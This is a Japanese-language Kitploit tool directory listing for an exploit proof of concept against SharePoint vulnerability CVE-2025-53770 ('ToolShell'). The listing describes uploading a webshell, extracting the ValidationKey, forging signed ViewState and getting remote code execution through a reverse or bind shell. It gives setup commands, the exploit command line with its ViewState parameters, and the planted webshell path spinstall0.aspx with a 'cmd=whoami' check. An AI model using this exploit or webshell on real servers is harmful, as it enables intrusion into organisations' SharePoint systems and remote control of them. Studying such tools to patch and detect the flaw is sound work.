Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Toolshell_CVE-2025-53770 | Kitploit
ツール/GitHubGitHub/greenforcenetworks/toolshell_cve-2025-53770
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツール
GitHubgreenforcenetworks/toolshell_cve-2025-53770

Toolshell_CVE-2025-53770

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1年前未レビュー

ToolShell → CVE‑2025‑53770 Exploit PoC

このパッケージは以下を可能にします:

  1. SharePoint への webshell アップロード
  2. ValidationKey の抽出
  3. 署名付き ViewState の生成
  4. リバース/バインドシェルによる RCE

🔧 セットアップ

root@kitploit:~
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt

🤖 実行方法

webshell をアップロードします

SharePoint ページからページソースにアクセスできます。view source タブに移動するだけで、利用可能な場合には以下の情報が得られ、コピーできます:

A) __VIEWSTATEGENERATOR

B) __EVENTVALIDATION

C) (any current __VIEWSTATE for context)

root@kitploit:~

python3 toolshell_exploit.py \
  --target https://sharepoint.local \
  --viewstate "<any_BASE64_VIEWSTATE>" \
  --generator "<VIEWSTATEGENERATOR>" \
  --eventval "<EVENTVALIDATION>"

これにより spinstall0.aspx がアップロードされます。 確認: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami

ツールをダウンロード